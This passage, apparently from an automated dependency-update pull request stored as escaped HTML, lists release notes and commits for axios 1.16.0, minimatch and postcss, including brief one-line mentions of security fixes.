follow-up review. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10810\"\u003e#10810\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependencies:\u003c/strong\u003e Bumped \u003ccode\u003eactions/setup-node\u003c/code\u003e, the \u003ccode\u003egithub-actions\u003c/code\u003e group, and \u003ccode\u003epostcss\u003c/code\u003e (in \u003ccode\u003e/docs\u003c/code\u003e) to their latest versions. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10785\"\u003e#10785\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10813\"\u003e#10813\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10814\"\u003e#10814\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRelease:\u003c/strong\u003e Updated changelog and packages, and prepared the 1.16.0 release. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10790\"\u003e#10790\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10834\"\u003e#10834\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🌟 New Contributors\u003c/h2\u003e\n\u003cp\u003eWe are thrilled to welcome our new contributors. Thank you for helping improve axios:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/singhankit001\"\u003e\u003ccode\u003e@​singhankit001\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10588\"\u003e#10588\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/cuiweixie\"\u003e\u003ccode\u003e@​cuiweixie\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7419\"\u003e#7419\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/iruizsalinas\"\u003e\u003ccode\u003e@​iruizsalinas\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10787\"\u003e#10787\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/MarcosNocetti\"\u003e\u003ccode\u003e@​MarcosNocetti\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10680\"\u003e#10680\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/deepview-autofix\"\u003e\u003ccode\u003e@​deepview-autofix\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10729\"\u003e#10729\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/blob/v1.x/CHANGELOG.md\"\u003eaxios's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.16.0 — May 2, 2026\u003c/h2\u003e\n\u003cp\u003eThis release adds support for the QUERY HTTP method and a new \u003ccode\u003eECONNREFUSED\u003c/code\u003e error constant, lands a substantial wave of HTTP, fetch, and XHR adapter bug fixes around redirects, aborts, headers, and timeouts, and welcomes 23 new contributors.\u003c/p\u003e\n\u003ch2\u003e⚠️ Notable Changes\u003c/h2\u003e\n\u003cp\u003eA handful of fixes in this release are either security-adjacent or change observable behaviour. Please review before upgrading:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFetch adapter now enforces \u003ccode\u003emaxBodyLength\u003c/code\u003e and \u003ccode\u003emaxContentLength\u003c/code\u003e.\u003c/strong\u003e These limits were silently ignored on the fetch adapter prior to 1.16.0 — anyone relying on them as a safety net (DoS protection, accidental large uploads) had no protection. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10795\"\u003e#10795\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProxy requests now preserve user-supplied \u003ccode\u003eHost\u003c/code\u003e headers.\u003c/strong\u003e Previously, the proxy path could overwrite a custom \u003ccode\u003eHost\u003c/code\u003e. Virtual-host-style routing through a proxy will now behave correctly. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10822\"\u003e#10822\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBasic auth credentials embedded in URLs are now URL-decoded.\u003c/strong\u003e If you have percent-encoded credentials in a URL (e.g. \u003ccode\u003ehttps://user:p%40ss@host\u003c/code\u003e), the decoded value is what now goes on the wire. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10825\"\u003e#10825\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eparseProtocol\u003c/code\u003e now strictly requires a colon in the protocol separator.\u003c/strong\u003e Strings that loosely parsed as protocols before may no longer match. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10729\"\u003e#10729\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDeprecated \u003ccode\u003eunescape()\u003c/code\u003e replaced with modern UTF-8 encoding.\u003c/strong\u003e Non-ASCII URL handling is now spec-correct; consumers depending on legacy \u003ccode\u003eunescape()\u003c/code\u003e quirks may see different output bytes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7378\"\u003e#7378\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003etransformRequest\u003c/code\u003e input typing change was reverted.\u003c/strong\u003e The typing change introduced in \u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e was reverted in \u003ca href=\"https://redirect.github.com/axios/axios/issues/10810\"\u003e#10810\u003c/a\u003e after follow-up review — net behavior is unchanged from 1.15.2. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10810\"\u003e#10810\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eQUERY HTTP Method:\u003c/strong\u003e Added support for the QUERY HTTP method across adapters and type definitions. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10802\"\u003e#10802\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eECONNREFUSED Error Constant:\u003c/strong\u003e Exposed \u003ccode\u003eECONNREFUSED\u003c/code\u003e as a constant on \u003ccode\u003eAxiosError\u003c/code\u003e so callers can match connection-refused failures without comparing string literals (closes \u003ca href=\"https://redirect.github.com/axios/axios/issues/6485\"\u003e#6485\u003c/a\u003e). (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10680\"\u003e#10680\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eEncode Helper Export:\u003c/strong\u003e Exported the internal \u003ccode\u003eencode\u003c/code\u003e helper from \u003ccode\u003ebuildURL\u003c/code\u003e so userland param serializers can reuse the same encoding logic that axios uses internally. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6897\"\u003e#6897\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP Adapter — Redirects \u0026amp; Headers:\u003c/strong\u003e Cleared stale headers when a redirect targets a no-proxy host, fixed the redirect listener chain so listeners no longer stack across hops, restored the missing \u003ccode\u003erequestDetails\u003c/code\u003e argument on \u003ccode\u003ebeforeRedirect\u003c/code\u003e, preserved user-supplied \u003ccode\u003eHost\u003c/code\u003e headers when forwarding through a proxy, and properly URL-decoded basic auth credentials. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10794\"\u003e#10794\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10800\"\u003e#10800\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6241\"\u003e#6241\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10822\"\u003e#10822\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10825\"\u003e#10825\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHTTP Adapter — Streams \u0026amp; Timeouts:\u003c/strong\u003e Preserved the partial response object on \u003ccode\u003eAxiosError\u003c/code\u003e when a stream is aborted after headers arrive, honoured the \u003ccode\u003etimeout\u003c/code\u003e option during the connect phase when redirects are disabled, and resolved an unsettled-promise hang when an aborted request was combined with compression and \u003ccode\u003emaxRedirects: 0\u003c/code\u003e. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10708\"\u003e#10708\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10819\"\u003e#10819\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7149\"\u003e#7149\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFetch Adapter:\u003c/strong\u003e Enforced \u003ccode\u003emaxBodyLength\u003c/code\u003e / \u003ccode\u003emaxContentLength\u003c/code\u003e in the fetch adapter, set the \u003ccode\u003eUser-Agent\u003c/code\u003e header to match the HTTP adapter, preserved the original abort reason instead of replacing it with a generic error, and deferred global access so importing the module no longer throws a \u003ccode\u003eTypeError\u003c/code\u003e in restricted environments. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10795\"\u003e#10795\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10772\"\u003e#10772\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10806\"\u003e#10806\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7260\"\u003e#7260\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eXHR Adapter:\u003c/strong\u003e Unsubscribed the \u003ccode\u003ecancelToken\u003c/code\u003e and \u003ccode\u003eAbortSignal\u003c/code\u003e listeners on the error, timeout, and abort code paths to prevent leaked subscriptions. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10787\"\u003e#10787\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eError Handling:\u003c/strong\u003e Attached the parsed response to \u003ccode\u003eAxiosError\u003c/code\u003e when \u003ccode\u003eJSON.parse\u003c/code\u003e fails inside \u003ccode\u003edispatchRequest\u003c/code\u003e, prevented \u003ccode\u003esettle\u003c/code\u003e from emitting \u003ccode\u003eundefined\u003c/code\u003e error codes, and tightened the \u003ccode\u003eparseProtocol\u003c/code\u003e regex to require a colon in the protocol separator. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10724\"\u003e#10724\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7276\"\u003e#7276\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10729\"\u003e#10729\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTypes \u0026amp; Exports:\u003c/strong\u003e Aligned the CommonJS \u003ccode\u003eCancelToken\u003c/code\u003e typings with the ESM build, fixed a compiler error caused by \u003ccode\u003eRawAxiosHeaders\u003c/code\u003e, and re-exported \u003ccode\u003ecreate\u003c/code\u003e from the package index. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7414\"\u003e#7414\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6389\"\u003e#6389\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/6460\"\u003e#6460\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUTF-8 Encoding:\u003c/strong\u003e Replaced the deprecated \u003ccode\u003eunescape()\u003c/code\u003e call with a modern UTF-8 encoding implementation. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7378\"\u003e#7378\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMisc Cleanup:\u003c/strong\u003e Resolved a batch of small inconsistencies and gadget-level issues across the codebase. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10833\"\u003e#10833\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRefactor — ES6 Modernisation:\u003c/strong\u003e Modernised the \u003ccode\u003eutils\u003c/code\u003e module and XHR adapter to use ES6 features, and tidied the multipart boundary error message. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10588\"\u003e#10588\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7419\"\u003e#7419\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eTests:\u003c/strong\u003e Hardened the HTTP test server lifecycle to fix flaky \u003ccode\u003eFormData\u003c/code\u003e EPIPE failures, fixed Win32 platform support for the pipe tests, and corrected an incorrect test assumption. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10820\"\u003e#10820\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10791\"\u003e#10791\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10796\"\u003e#10796\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDocs:\u003c/strong\u003e Documented \u003ccode\u003eparamsSerializer.encode\u003c/code\u003e for strict RFC 3986 query encoding, updated the \u003ccode\u003eparseReviver\u003c/code\u003e TypeScript definitions and configuration docs for ES2023, added timeout guidance to the README's first async example, and expanded notes around the recent type changes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10821\"\u003e#10821\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10782\"\u003e#10782\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10759\"\u003e#10759\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10804\"\u003e#10804\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eReverted:\u003c/strong\u003e Reverted the \u003ccode\u003etransformRequest\u003c/code\u003e input typing change from \u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e after follow-up review. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10745\"\u003e#10745\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10810\"\u003e#10810\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependencies:\u003c/strong\u003e Bumped \u003ccode\u003eactions/setup-node\u003c/code\u003e, the \u003ccode\u003egithub-actions\u003c/code\u003e group, and \u003ccode\u003epostcss\u003c/code\u003e (in \u003ccode\u003e/docs\u003c/code\u003e) to their latest versions. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10785\"\u003e#10785\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10813\"\u003e#10813\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10814\"\u003e#10814\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRelease:\u003c/strong\u003e Updated changelog and packages, and prepared the 1.16.0 release. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10790\"\u003e#10790\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10834\"\u003e#10834\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🌟 New Contributors\u003c/h2\u003e\n\u003cp\u003eWe are thrilled to welcome our new contributors. Thank you for helping improve axios:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/singhankit001\"\u003e\u003ccode\u003e@​singhankit001\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10588\"\u003e#10588\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/cuiweixie\"\u003e\u003ccode\u003e@​cuiweixie\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7419\"\u003e#7419\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/iruizsalinas\"\u003e\u003ccode\u003e@​iruizsalinas\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10787\"\u003e#10787\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/MarcosNocetti\"\u003e\u003ccode\u003e@​MarcosNocetti\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10680\"\u003e#10680\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/deepview-autofix\"\u003e\u003ccode\u003e@​deepview-autofix\u003c/code\u003e\u003c/a\u003e\u003c/strong\u003e (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10729\"\u003e#10729\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/df53d7dd99b202fb194217abd127ae6a630e70dc\"\u003e\u003ccode\u003edf53d7d\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.16.0 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10834\"\u003e#10834\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/9d92bcd32639d1eea5b89f03ae45f248d3bb058e\"\u003e\u003ccode\u003e9d92bcd\u003c/code\u003e\u003c/a\u003e fix: gadgets and smaller issues (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10833\"\u003e#10833\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/5107ee69aee527b19eabaf80000ca65752135435\"\u003e\u003ccode\u003e5107ee6\u003c/code\u003e\u003c/a\u003e fix: prevent undefined error codes in settle (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7276\"\u003e#7276\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/e57349992f230b6b13e80613eb84302560aa5ba8\"\u003e\u003ccode\u003ee573499\u003c/code\u003e\u003c/a\u003e fix(fetch): defer global access in fetch adapter (\u003ca href=\"https://redirect.github.com/axios/axios/issues/7260\"\u003e#7260\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/ad68e1a484b50086af427f767bbd7d6e3aab7ac3\"\u003e\u003ccode\u003ead68e1a\u003c/code\u003e\u003c/a\u003e fix(http): honor timeout during connect without redirects (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10819\"\u003e#10819\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/2a51828213128691d2e37502b5eb2cf4965a737d\"\u003e\u003ccode\u003e2a51828\u003c/code\u003e\u003c/a\u003e fix(http): decode URL basic auth credentials (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10825\"\u003e#10825\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/0e8b6bbb542131bae9940618d84d5286255d4db1\"\u003e\u003ccode\u003e0e8b6bb\u003c/code\u003e\u003c/a\u003e fix(http): preserve user-supplied Host header when forwarding through a proxy...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/79f39e1d041dca87173226d0255f90eaf252564b\"\u003e\u003ccode\u003e79f39e1\u003c/code\u003e\u003c/a\u003e docs: document paramsSerializer.encode for strict RFC 3986 query encoding (\u003ca href=\"https://redirect.github.com/axios/axios/issues/1\"\u003e#1\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/0fe3a5fc14829535e1d517c662d448e86c33438e\"\u003e\u003ccode\u003e0fe3a5f\u003c/code\u003e\u003c/a\u003e [Docs/Types] Update \u003ccode\u003eparseReviver\u003c/code\u003e TypeScript definitions for ES2023 and add ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/cd6737fd84bdb7caf2a319d3579573a49f9d238d\"\u003e\u003ccode\u003ecd6737f\u003c/code\u003e\u003c/a\u003e chore: matches the sibling responseStream.on(aborted) handler and added tests...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v1.15.0...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `minimatch` from 3.0.3 to 10.2.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/7bba97888a27a6162983056bcce2a6e28f668712\"\u003e\u003ccode\u003e7bba978\u003c/code\u003e\u003c/a\u003e 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/bd259425b2ca17b42897997f93e890314155522d\"\u003e\u003ccode\u003ebd25942\u003c/code\u003e\u003c/a\u003e docs: add warning about ReDoS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a9c27c75725474dbde57db2995b6281b267756d\"\u003e\u003ccode\u003e1a9c27c\u003c/code\u003e\u003c/a\u003e fix partial matching of globstar patterns\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/1a2e084af579731af66c221214e3ca8222c9bf23\"\u003e\u003ccode\u003e1a2e084\u003c/code\u003e\u003c/a\u003e 3.1.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/ae24656237c3d58067442f790ce17eff84463a47\"\u003e\u003ccode\u003eae24656\u003c/code\u003e\u003c/a\u003e update lockfile\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/b1003749228b2a79e1f237963a0d559ef7a0941e\"\u003e\u003ccode\u003eb100374\u003c/code\u003e\u003c/a\u003e limit recursion for **, improve perf considerably\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/26ffeaa091b9f660833e23f42e07165b33e85c13\"\u003e\u003ccode\u003e26ffeaa\u003c/code\u003e\u003c/a\u003e lockfile update\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/9eca892a4e5dbb20534f9f30483b85cdeee6c2eb\"\u003e\u003ccode\u003e9eca892\u003c/code\u003e\u003c/a\u003e lock node version to 14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/00c323b188b704e5d4bc534ecec2268cfa70a32a\"\u003e\u003ccode\u003e00c323b\u003c/code\u003e\u003c/a\u003e 3.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/minimatch/commit/30486b2048929264f44d18822891cfffa02af78b\"\u003e\u003ccode\u003e30486b2\u003c/code\u003e\u003c/a\u003e update CI matrix and actions\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/minimatch/compare/v3.0.4...v3.1.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `postcss` from 8.4.31 to 8.5.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/releases\"\u003epostcss's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca 